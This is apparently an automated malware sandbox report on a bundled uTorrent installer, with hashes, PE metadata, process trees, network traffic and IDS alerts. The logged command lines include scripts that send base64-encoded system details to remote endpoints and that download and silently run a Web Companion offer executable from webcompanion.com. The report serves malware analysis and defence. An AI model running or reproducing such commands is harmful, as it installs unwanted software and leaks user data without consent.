download: | utorrent.45231.installer.exe |
Full analysis: | https://app.any.run/tasks/723ea532-2d31-4030-bf86-15dc71d1898b |
Verdict: | Malicious activity |
Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
Analysis date: | May 24, 2019, 14:23:14 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/x-dosexec |
File info: | PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed |
MD5: | 93BAF5FBCDF3B94E1084C0FAC6AEE7A0 |
SHA1: | 4D930FD21CC1E57F6E9EC9F65BF8CFE957D5635A |
SHA256: | 66C6FCE626A40C758F6AAF2282474A38E95327BDD09F0D95B55100C6E6F167E9 |
SSDEEP: | 24576:tHLR/jew2Xh6xHnTRS/c/hjscwnBoqbD0cFye5D2NuTlto4FdhnbABrqYC81z4:tFb2GY/c/hozbD0C5KNsnLFdkHC/ |
.exe | | | UPX compressed Win32 Executable (43.5) |
---|---|---|
.exe | | | Win32 EXE Yoda's Crypter (42.7) |
.exe | | | Win32 Executable (generic) (7.2) |
.exe | | | Generic Win/DOS Executable (3.2) |
.exe | | | DOS Executable Generic (3.2) |
SpecialBuild: | stable34 stable |
---|---|
ProductVersion: | 3.5.5.45231 |
ProductName: | µTorrent |
LegalCopyright: | ©2019 BitTorrent, Inc. All Rights Reserved. |
OriginalFileName: | uTorrent.exe |
InternalName: | uTorrent.exe |
FileVersion: | 3.5.5.45231 |
FileDescription: | µTorrent |
CompanyName: | BitTorrent Inc. |
CharacterSet: | Windows, Latin1 |
LanguageCode: | English (U.S.) |
FileSubtype: | - |
ObjectFileType: | Unknown |
FileOS: | Unknown (0) |
FileFlags: | Special build |
FileFlagsMask: | 0x002b |
ProductVersionNumber: | 3.5.5.45231 |
FileVersionNumber: | 3.5.5.45231 |
Subsystem: | Windows GUI |
SubsystemVersion: | 5.1 |
ImageVersion: | - |
OSVersion: | 5.1 |
EntryPoint: | 0x5002b0 |
UninitializedDataSize: | 3387392 |
InitializedDataSize: | 126976 |
CodeSize: | 1855488 |
LinkerVersion: | 14 |
PEType: | PE32 |
TimeStamp: | 2019:05:08 23:26:28+02:00 |
MachineType: | Intel 386 or later, and compatibles |
Architecture: | IMAGE_FILE_MACHINE_I386 |
---|---|
Subsystem: | IMAGE_SUBSYSTEM_WINDOWS_GUI |
Compilation Date: | 08-May-2019 21:26:28 |
Detected languages: |
|
CompanyName: | BitTorrent Inc. |
FileDescription: | µTorrent |
FileVersion: | 3.5.5.45231 |
InternalName: | uTorrent.exe |
OriginalFilename: | uTorrent.exe |
LegalCopyright: | ©2019 BitTorrent, Inc. All Rights Reserved. |
ProductName: | µTorrent |
ProductVersion: | 3.5.5.45231 |
SpecialBuild: | stable34 stable |
Magic number: | MZ |
---|---|
Bytes on last page of file: | 0x0090 |
Pages in file: | 0x0003 |
Relocations: | 0x0000 |
Size of header: | 0x0004 |
Min extra paragraphs: | 0x0000 |
Max extra paragraphs: | 0xFFFF |
Initial SS value: | 0x0000 |
Initial SP value: | 0x00B8 |
Checksum: | 0x0000 |
Initial IP value: | 0x0000 |
Initial CS value: | 0x0000 |
Overlay number: | 0x0000 |
OEM identifier: | 0x0000 |
OEM information: | 0x0000 |
Address of NE header: | 0x00000140 |
Signature: | PE |
---|---|
Machine: | IMAGE_FILE_MACHINE_I386 |
Number of sections: | 3 |
Time date stamp: | 08-May-2019 21:26:28 |
Pointer to Symbol Table: | 0x00000000 |
Number of symbols: | 0 |
Size of Optional Header: | 0x00E0 |
Characteristics: |
|
Name | Virtual Address | Virtual Size | Raw Size | Charateristics | Entropy |
---|---|---|---|---|---|
UPX0 | 0x00001000 | 0x0033B000 | 0x00000000 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 0 |
UPX1 | 0x0033C000 | 0x001C5000 | 0x001C5000 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 7.99987 |
.rsrc | 0x00501000 | 0x0001F000 | 0x0001EC00 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE | 7.01891 |
Title | Entropy | Size | Codepage | Language | Type |
---|---|---|---|---|---|
1 | 5.11079 | 1835 | UNKNOWN | Swedish - Sweden | RT_MANIFEST |
2 | 7.79992 | 1003 | UNKNOWN | Swedish - Sweden | RT_HTML |
3 | 5.79291 | 62 | UNKNOWN | Swedish - Sweden | RT_GROUP_ICON |
4 | 7.98271 | 9640 | UNKNOWN | English - United States | RT_ICON |
5 | 4.02193 | 20 | UNKNOWN | Swedish - Sweden | RT_GROUP_ICON |
6 | 7.98133 | 9640 | UNKNOWN | English - United States | RT_ICON |
7 | 7.98122 | 9640 | UNKNOWN | English - United States | RT_ICON |
8 | 7.97878 | 9640 | UNKNOWN | English - United States | RT_ICON |
9 | 7.98096 | 9640 | UNKNOWN | English - United States | RT_ICON |
10 | 6.4403 | 114 | UNKNOWN | Swedish - Sweden | RT_DIALOG |
ADVAPI32.dll |
COMCTL32.dll |
COMDLG32.dll |
DNSAPI.dll |
GDI32.dll |
IPHLPAPI.DLL |
KERNEL32.DLL |
MSIMG32.dll |
OLEAUT32.dll |
PSAPI.DLL |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3632 | "C:\Users\admin\AppData\Local\Temp\utorrent.45231.installer.exe" | C:\Users\admin\AppData\Local\Temp\utorrent.45231.installer.exe | explorer.exe | |
User: admin Company: BitTorrent Inc. Integrity Level: MEDIUM Description: µTorrent Exit code: 0 Version: 3.5.5.45231 | ||||
2552 | "C:\Users\admin\AppData\Local\Temp\utorrent.45231.installer.exe" /HYDRA_PERMISSIONS_RESTART /HYDRA_LOG "C:\Users\admin\AppData\Local\Temp\HYD3A1F.tmp.1558707816\index.hta.log" /HYDRA_HTADIR "C:\Users\admin\AppData\Local\Temp\HYD3A1F.tmp.1558707816\HTA" | C:\Users\admin\AppData\Local\Temp\utorrent.45231.installer.exe | utorrent.45231.installer.exe | |
User: admin Company: BitTorrent Inc. Integrity Level: HIGH Description: µTorrent Exit code: 0 Version: 3.5.5.45231 | ||||
2176 | "C:\Windows\System32\mshta.exe" "C:\Users\admin\AppData\Local\Temp\HYD3A1F.tmp.1558707816\HTA\index.hta?utorrent" "C:\Users\admin\AppData\Local\Temp\utorrent.45231.installer.exe" /LOG "C:\Users\admin\AppData\Local\Temp\HYD3A1F.tmp.1558707816\index.hta.log" /PID "2552" /CID "3vqe1CDNv2PqS7x0" /VERSION "111915183" /BUCKET "0" /SSB "4" /COUNTRY "US" /OS "6.1" /BROWSERS "\"C:\Program Files\Mozilla Firefox\firefox.exe\",\"C:\Program Files\Google\Chrome\Application\chrome.exe\",C:\Program Files\Internet Explorer\iexplore.exe,\"C:\Program Files\Opera\Opera.exe\"" /ARCHITECTURE "32" /LANG "en" /USERNAME "admin" /SID "S-1-5-21-1302019708-1500728564-335382590-1000" /CLIENT "utorrent" | C:\Windows\System32\mshta.exe | utorrent.45231.installer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Microsoft (R) HTML Application host Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
1020 | "C:\Windows\System32\cscript.exe" "shell_scripts/check_if_cscript_is_working.js" | C:\Windows\System32\cscript.exe | — | mshta.exe |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Microsoft ® Console Based Script Host Exit code: 99 Version: 5.8.7600.16385 | ||||
2156 | "C:\Windows\System32\PING.EXE" 8.8.8.8 -n 2 -w 500 | C:\Windows\System32\PING.EXE | — | mshta.exe |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: TCP/IP Ping Command Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
4032 | "C:\Windows\System32\cscript.exe" shell_scripts/shell_ping_after_close.js "http://i-50.b-000.XYZ.bench.utorrent.com/e?i=50&e=eyJldmVudE5hbWUiOiJoeWRyYTEiLCJhY3Rpb24iOiJodGFiZWdpbiIsInBpZCI6IjI1NTIiLCJoIjoiM3ZxZTFDRE52MlBxUzd4MCIsInYiOiIxMTE5MTUxODMiLCJiIjo0NTIzMSwiY2wiOiJ1VG9ycmVudCIsIm9zYSI6IjMyIiwic2xuZyI6ImVuIiwiZGIiOiJXaW5kb3dzIEludGVybmV0IEV4cGxvcmVyIiwiZGJ2IjoiOC4wIiwiaWJyIjpbeyJuYW1lIjoiRmlyZWZveCIsInZlcnNpb24iOiI2NS4wIiwiZXhlTmFtZSI6ImZpcmVmb3gifSx7Im5hbWUiOiJHb29nbGUgQ2hyb21lIiwidmVyc2lvbiI6IjczLjAiLCJleGVOYW1lIjoiY2hyb21lIn0seyJuYW1lIjoiV2luZG93cyBJbnRlcm5ldCBFeHBsb3JlciIsInZlcnNpb24iOiI4LjAiLCJleGVOYW1lIjoiaWV4cGxvcmUifSx7Im5hbWUiOiJPcGVyYSBJbnRlcm5ldCBCcm93c2VyIiwidmVyc2lvbiI6IjEyLjE1IiwiZXhlTmFtZSI6Im9wZXJhIn1dLCJpcCI6Ijg1LjIwMy4yMC4xMSIsImNuIjoiSXRhbHkiLCJwYWNraWQiOiJsYXZhc29mdF9iaW5nIn0=" | C:\Windows\System32\cscript.exe | mshta.exe | |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Microsoft ® Console Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
2752 | "C:\Windows\System32\cscript.exe" shell_scripts/shell_ping_after_close.js "http://i-50.b-000.XYZ.bench.utorrent.com/e?i=50&e=eyJldmVudE5hbWUiOiJoeWRyYTEiLCJhY3Rpb24iOiJodGFTdWNjZXNzIiwicGlkIjoiMjU1MiIsImgiOiIzdnFlMUNETnYyUHFTN3gwIiwidiI6IjExMTkxNTE4MyIsImIiOjQ1MjMxLCJjbCI6InVUb3JyZW50Iiwib3NhIjoiMzIiLCJzbG5nIjoiZW4iLCJkYiI6IldpbmRvd3MgSW50ZXJuZXQgRXhwbG9yZXIiLCJkYnYiOiI4LjAiLCJpYnIiOlt7Im5hbWUiOiJGaXJlZm94IiwidmVyc2lvbiI6IjY1LjAiLCJleGVOYW1lIjoiZmlyZWZveCJ9LHsibmFtZSI6Ikdvb2dsZSBDaHJvbWUiLCJ2ZXJzaW9uIjoiNzMuMCIsImV4ZU5hbWUiOiJjaHJvbWUifSx7Im5hbWUiOiJXaW5kb3dzIEludGVybmV0IEV4cGxvcmVyIiwidmVyc2lvbiI6IjguMCIsImV4ZU5hbWUiOiJpZXhwbG9yZSJ9LHsibmFtZSI6Ik9wZXJhIEludGVybmV0IEJyb3dzZXIiLCJ2ZXJzaW9uIjoiMTIuMTUiLCJleGVOYW1lIjoib3BlcmEifV0sImlwIjoiODUuMjAzLjIwLjExIiwiY24iOiJJdGFseSIsInBhY2tpZCI6ImxhdmFzb2Z0X2JpbmcifQ==" | C:\Windows\System32\cscript.exe | mshta.exe | |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Microsoft ® Console Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
2524 | "C:\Windows\System32\cscript.exe" shell_scripts/shell_ping_after_close.js "http://i-50.b-000.XYZ.bench.utorrent.com/e?i=50&e=eyJldmVudE5hbWUiOiJoeWRyYTEiLCJhY3Rpb24iOiJvZmZlciIsInBpZCI6IjI1NTIiLCJoIjoiM3ZxZTFDRE52MlBxUzd4MCIsInYiOiIxMTE5MTUxODMiLCJiIjo0NTIzMSwiY2wiOiJ1VG9ycmVudCIsIm9zYSI6IjMyIiwic2xuZyI6ImVuIiwiZGIiOiJXaW5kb3dzIEludGVybmV0IEV4cGxvcmVyIiwiZGJ2IjoiOC4wIiwiaWJyIjpbeyJuYW1lIjoiRmlyZWZveCIsInZlcnNpb24iOiI2NS4wIiwiZXhlTmFtZSI6ImZpcmVmb3gifSx7Im5hbWUiOiJHb29nbGUgQ2hyb21lIiwidmVyc2lvbiI6IjczLjAiLCJleGVOYW1lIjoiY2hyb21lIn0seyJuYW1lIjoiV2luZG93cyBJbnRlcm5ldCBFeHBsb3JlciIsInZlcnNpb24iOiI4LjAiLCJleGVOYW1lIjoiaWV4cGxvcmUifSx7Im5hbWUiOiJPcGVyYSBJbnRlcm5ldCBCcm93c2VyIiwidmVyc2lvbiI6IjEyLjE1IiwiZXhlTmFtZSI6Im9wZXJhIn1dLCJpcCI6Ijg1LjIwMy4yMC4xMSIsImNuIjoiSXRhbHkiLCJvZmZlcnR5cGUiOiJwcmltYXJ5IiwicHJvdmlkZXIiOiJsYXZhc29mdF9iaW5nIiwib2ZmZXIiOiJsYXZhc29mdF9iaW5nIiwib2ZmZXJyZXN1bHQiOjF9" | C:\Windows\System32\cscript.exe | mshta.exe | |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Microsoft ® Console Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
2068 | "C:\Windows\System32\cscript.exe" shell_scripts/shell_install_offer.js "C:/Users/admin/AppData/Local/Temp/HYD3A1F.tmp.1558707816/sideLog.log" "lavasoft_bing" "http://webcompanion.com/nano_download.php?partner=BT170902" "--silent%20--partner%3DBT170902%20--homepage%3D1%20--search%3D1" "0" "admin" "admin" | C:\Windows\System32\cscript.exe | mshta.exe | |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Microsoft ® Console Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
3600 | "C:\Users\admin\AppData\Local\Temp\offer-DA1AEBF9-0C32-4EA8-8AA3-49915DD2A3B0.exe" --silent --partner=BT170902 --homepage=1 --search=1 | C:\Users\admin\AppData\Local\Temp\offer-DA1AEBF9-0C32-4EA8-8AA3-49915DD2A3B0.exe | cscript.exe | |
User: admin Company: Lavasoft Integrity Level: HIGH Description: Web Companion Installer Version: 4.7.1987.3881 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3632 | utorrent.45231.installer.exe | C:\Users\admin\AppData\Local\Temp\utt38F5.tmp | — | |
MD5:— | SHA256:— | |||
3632 | utorrent.45231.installer.exe | C:\Users\admin\AppData\Roaming\uTorrent\settings.dat.new | — | |
MD5:— | SHA256:— | |||
3632 | utorrent.45231.installer.exe | C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1302019708-1500728564-335382590-1000\1f91d2d17ea675d4c2c3192e241743f9_90059c37-1320-41a4-b58d-2b75a9850d2f | binary | |
MD5:354ED1BE88B782FC192F27E695921A2A | SHA256:D60199E98844AD53BADAAB84ED033FFBC40AFBA1F2967E973C32829D0AB7EC99 | |||
3632 | utorrent.45231.installer.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@localhost[1].txt | text | |
MD5:2349784957088622B3E58E227F710431 | SHA256:68765A98C2DA4BE53D9597B271F7BA221CDA2553CB2CCFD728ECCCC087F4FF8D | |||
3632 | utorrent.45231.installer.exe | C:\Users\admin\AppData\Roaming\uTorrent\settings.dat | binary | |
MD5:BEBFFCACBBB56CD62966F3EF425E1747 | SHA256:3981F0088321E63EC910816A04D04B920519EBAFA9BFB7EB726A3094B5E95FA4 | |||
3632 | utorrent.45231.installer.exe | C:\Users\admin\AppData\Local\Temp\HYD3A1F.tmp.1558707816\HTA\i18n\it.json | html | |
MD5:985938F0DF5251B549A1B99DBAC1F69C | SHA256:ACA4F9BF79A3F84AE6A9D36680DF5D182AC93B1AA649775E1618B49FBD22A34B | |||
3632 | utorrent.45231.installer.exe | C:\Users\admin\AppData\Local\Temp\HYD3A1F.tmp.1558707816\index.hta.log | text | |
MD5:2B632A88AF93F552846FDBF6890E8613 | SHA256:2B1D8F74B6B7EF3811B62E9320953577A736ED64AB9DD5C3E2390D994A10D234 | |||
3632 | utorrent.45231.installer.exe | C:\Users\admin\AppData\Local\Temp\HYD3A1F.tmp.1558707816\HTA\images\bt_icon_48px.png | image | |
MD5:6B6BD42C4A13B48F45A9F278B23D6B2B | SHA256:7C5123103DC089C1912B1EAE0BBBE2B7C32E39ECF83649A53A8E9F3AEA960602 | |||
3632 | utorrent.45231.installer.exe | C:\Users\admin\AppData\Local\Temp\HYD3A1F.tmp.1558707816\HTA\i18n\pt.json | html | |
MD5:FB63D52AC25CD3D272365FA75F74C279 | SHA256:E39D6A57D2F16E60C4075D07741DADD6A2742A85ACEB250083D7AB103279F737 | |||
3632 | utorrent.45231.installer.exe | C:\Users\admin\AppData\Local\Temp\HYD3A1F.tmp.1558707816\HTA\i18n\ru.json | html | |
MD5:4F268BCA1F6AF01246F257A141CEC972 | SHA256:28B880822283482194EA9B4B94552A94E35F659CF026F592173ED46FCF3A91F4 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3632 | utorrent.45231.installer.exe | GET | 200 | 67.215.238.66:80 | http://download-lb.utorrent.com/endpoint/hydra-ut/os/win7/track/stable/browser/ie/os-region/US/os-lang/en/os-ver/6.1/enc-ver/111915183/ | US | compressed | 761 Kb | whitelisted |
2752 | cscript.exe | GET | 200 | 54.235.208.27:80 | http://i-50.b-000.xyz.bench.utorrent.com/e?i=50&e=eyJldmVudE5hbWUiOiJoeWRyYTEiLCJhY3Rpb24iOiJodGFTdWNjZXNzIiwicGlkIjoiMjU1MiIsImgiOiIzdnFlMUNETnYyUHFTN3gwIiwidiI6IjExMTkxNTE4MyIsImIiOjQ1MjMxLCJjbCI6InVUb3JyZW50Iiwib3NhIjoiMzIiLCJzbG5nIjoiZW4iLCJkYiI6IldpbmRvd3MgSW50ZXJuZXQgRXhwbG9yZXIiLCJkYnYiOiI4LjAiLCJpYnIiOlt7Im5hbWUiOiJGaXJlZm94IiwidmVyc2lvbiI6IjY1LjAiLCJleGVOYW1lIjoiZmlyZWZveCJ9LHsibmFtZSI6Ikdvb2dsZSBDaHJvbWUiLCJ2ZXJzaW9uIjoiNzMuMCIsImV4ZU5hbWUiOiJjaHJvbWUifSx7Im5hbWUiOiJXaW5kb3dzIEludGVybmV0IEV4cGxvcmVyIiwidmVyc2lvbiI6IjguMCIsImV4ZU5hbWUiOiJpZXhwbG9yZSJ9LHsibmFtZSI6Ik9wZXJhIEludGVybmV0IEJyb3dzZXIiLCJ2ZXJzaW9uIjoiMTIuMTUiLCJleGVOYW1lIjoib3BlcmEifV0sImlwIjoiODUuMjAzLjIwLjExIiwiY24iOiJJdGFseSIsInBhY2tpZCI6ImxhdmFzb2Z0X2JpbmcifQ== | US | text | 21 b | whitelisted |
2552 | utorrent.45231.installer.exe | GET | — | 98.143.146.7:80 | http://utorrent.com/download/langpacks/dl.php?build=45231&ref=client&client=utorrent&sys_l=en&sel_l=-1&tk=stable34 | US | — | — | whitelisted |
2556 | uTorrent.exe | GET | — | 173.254.195.58:80 | http://update.bittorrent.com/time.php | US | — | — | whitelisted |
3632 | utorrent.45231.installer.exe | POST | — | 54.225.194.96:80 | http://i-50.b-000.xyz.bench.utorrent.com/e?i=50 | US | — | — | whitelisted |
2068 | cscript.exe | GET | 200 | 104.17.178.102:80 | http://webcompanion.com/nano_download.php?partner=BT170902 | US | executable | 347 Kb | malicious |
3632 | utorrent.45231.installer.exe | POST | 200 | 54.225.194.96:80 | http://i-50.b-000.xyz.bench.utorrent.com/e?i=50 | US | text | 21 b | whitelisted |
2176 | mshta.exe | GET | 200 | 185.194.141.58:80 | http://ip-api.com/json?callback=jQuery191038992254780308044_1558707820092&_=1558707820093 | DE | text | 329 b | shared |
2552 | utorrent.45231.installer.exe | POST | 200 | 54.235.208.27:80 | http://i-50.b-000.xyz.bench.utorrent.com/e?i=50 | US | text | 21 b | whitelisted |
2556 | uTorrent.exe | GET | 200 | 87.248.202.1:80 | http://cdn.ap.bittorrent.com/control/tags/ut.json | IT | text | 8.72 Kb | shared |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3632 | utorrent.45231.installer.exe | 54.225.194.96:80 | i-50.b-000.xyz.bench.utorrent.com | Amazon.com, Inc. | US | whitelisted |
2176 | mshta.exe | 185.194.141.58:80 | ip-api.com | netcup GmbH | DE | unknown |
3632 | utorrent.45231.installer.exe | 67.215.238.66:80 | download-lb.utorrent.com | QuadraNet, Inc | US | suspicious |
2552 | utorrent.45231.installer.exe | 54.235.208.27:80 | i-50.b-000.xyz.bench.utorrent.com | Amazon.com, Inc. | US | whitelisted |
2752 | cscript.exe | 54.235.208.27:80 | i-50.b-000.xyz.bench.utorrent.com | Amazon.com, Inc. | US | whitelisted |
2552 | utorrent.45231.installer.exe | 54.225.194.96:80 | i-50.b-000.xyz.bench.utorrent.com | Amazon.com, Inc. | US | whitelisted |
4032 | cscript.exe | 54.225.194.96:80 | i-50.b-000.xyz.bench.utorrent.com | Amazon.com, Inc. | US | whitelisted |
3632 | utorrent.45231.installer.exe | 54.243.113.215:80 | i-50.b-000.xyz.bench.utorrent.com | Amazon.com, Inc. | US | suspicious |
2552 | utorrent.45231.installer.exe | 98.143.146.7:80 | utorrent.com | QuadraNet, Inc | US | suspicious |
2524 | cscript.exe | 54.235.208.27:80 | i-50.b-000.xyz.bench.utorrent.com | Amazon.com, Inc. | US | whitelisted |
Domain | IP | Reputation |
---|---|---|
router.bittorrent.com |
| shared |
router.utorrent.com |
| whitelisted |
i-50.b-000.xyz.bench.utorrent.com |
| whitelisted |
download-lb.utorrent.com |
| whitelisted |
ip-api.com |
| shared |
utorrent.com |
| whitelisted |
webcompanion.com |
| malicious |
i-21.b-45231.ut.bench.utorrent.com |
| suspicious |
apps.bittorrent.com |
| whitelisted |
update.bittorrent.com |
| whitelisted |
PID | Process | Class | Message |
---|---|---|---|
3632 | utorrent.45231.installer.exe | Misc activity | APP [PTsecurity] uTorrent Hydra Client POST JSON |
3632 | utorrent.45231.installer.exe | Misc activity | APP [PTsecurity] P2P uTorrent Hydra Client |
3632 | utorrent.45231.installer.exe | Misc activity | APP [PTsecurity] uTorrent Hydra Client POST JSON |
3632 | utorrent.45231.installer.exe | Misc activity | APP [PTsecurity] P2P uTorrent Hydra Client |
3632 | utorrent.45231.installer.exe | Misc activity | APP [PTsecurity] uTorrent Hydra Client POST JSON |
3632 | utorrent.45231.installer.exe | Misc activity | APP [PTsecurity] P2P uTorrent Hydra Client |
3632 | utorrent.45231.installer.exe | Misc activity | APP [PTsecurity] uTorrent Hydra Client response_code |
3632 | utorrent.45231.installer.exe | Misc activity | APP [PTsecurity] uTorrent Hydra Client response_code |
2552 | utorrent.45231.installer.exe | Misc activity | APP [PTsecurity] P2P uTorrent Hydra Client |
2552 | utorrent.45231.installer.exe | Misc activity | APP [PTsecurity] uTorrent Hydra Client POST JSON |
Process | Message |
---|---|
WebCompanionInstaller.exe | Detecting windows culture
|
WebCompanionInstaller.exe | 5/24/2019 3:24:08 PM :-> Starting installer 4.7.1987.3881 with: .\WebCompanionInstaller.exe --partner=BT170902 --version=4.7.1987.3881 --prod --silent --partner=BT170902 --homepage=1 --search=1, Run as admin: True
|
WebCompanionInstaller.exe | Preparing for installing Web Companion
|
WebCompanionInstaller.exe | 5/24/2019 3:24:09 PM :-> Generating Machine and Install Id ...
|
WebCompanionInstaller.exe | 5/24/2019 3:24:09 PM :-> Machine Id and Install Id has been generated
|
WebCompanionInstaller.exe | 5/24/2019 3:24:09 PM :-> Checking prerequisites ...
|
WebCompanionInstaller.exe | 5/24/2019 3:24:09 PM :-> Antivirus not detected
|
WebCompanionInstaller.exe | 5/24/2019 3:24:09 PM :-> vm_check False
|
WebCompanionInstaller.exe | 5/24/2019 3:24:10 PM :-> reg_check :False
|
WebCompanionInstaller.exe | 5/24/2019 3:24:11 PM :-> Installed .Net framework is V40
|